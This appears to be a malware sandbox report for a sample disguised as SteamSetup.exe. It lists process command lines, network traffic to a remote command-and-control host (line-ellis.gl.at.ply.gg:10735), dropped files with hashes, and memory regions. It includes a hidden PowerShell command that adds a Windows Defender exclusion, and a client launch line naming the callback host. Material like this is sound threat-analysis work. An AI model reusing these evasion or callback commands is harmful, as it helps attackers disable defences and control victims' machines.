"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

"C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

"PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 416 -p 1660 -ip 1660

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1660 -s 3976

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 404 -p 2876 -ip 2876

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2876 -s 3564

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 512 -p 1812 -ip 1812

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1812 -s 3500

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 5012 -ip 5012

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5012 -s 3564

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 528 -p 2980 -ip 2980

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2980 -s 3540

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 line-ellis.gl.at.ply.gg udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 202.74.101.95.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

memory/1684-133-0x0000000000A80000-0x0000000000CE0000-memory.dmp

memory/1684-134-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1684-135-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1684-136-0x0000000001590000-0x00000000015A0000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

memory/4924-148-0x000001EF5B460000-0x000001EF5B48E000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

memory/4924-150-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3940-158-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

memory/1684-163-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1772-164-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1772-165-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\System.dll

MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

memory/1772-167-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\nsDialogs.dll

MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\nsDialogs.dll

MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xm0fsxu5.dgw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3940-194-0x0000000004DD0000-0x0000000004E62000-memory.dmp

memory/1772-184-0x00000240F3B40000-0x00000240F3B62000-memory.dmp

memory/3940-195-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/3940-196-0x0000000004E80000-0x0000000004F1C000-memory.dmp

memory/4924-197-0x000001EF759D0000-0x000001EF759E0000-memory.dmp

memory/3940-198-0x0000000005000000-0x0000000005010000-memory.dmp

memory/3940-199-0x00000000056D0000-0x0000000005C74000-memory.dmp

memory/1772-200-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

memory/3940-201-0x0000000005590000-0x00000000055F6000-memory.dmp

memory/3940-204-0x0000000005E80000-0x0000000005ED0000-memory.dmp

memory/3232-218-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3232-219-0x000002CD01CC0000-0x000002CD01CD0000-memory.dmp

memory/1772-220-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

memory/1772-224-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/4924-227-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3232-228-0x000002CD01CC0000-0x000002CD01CD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
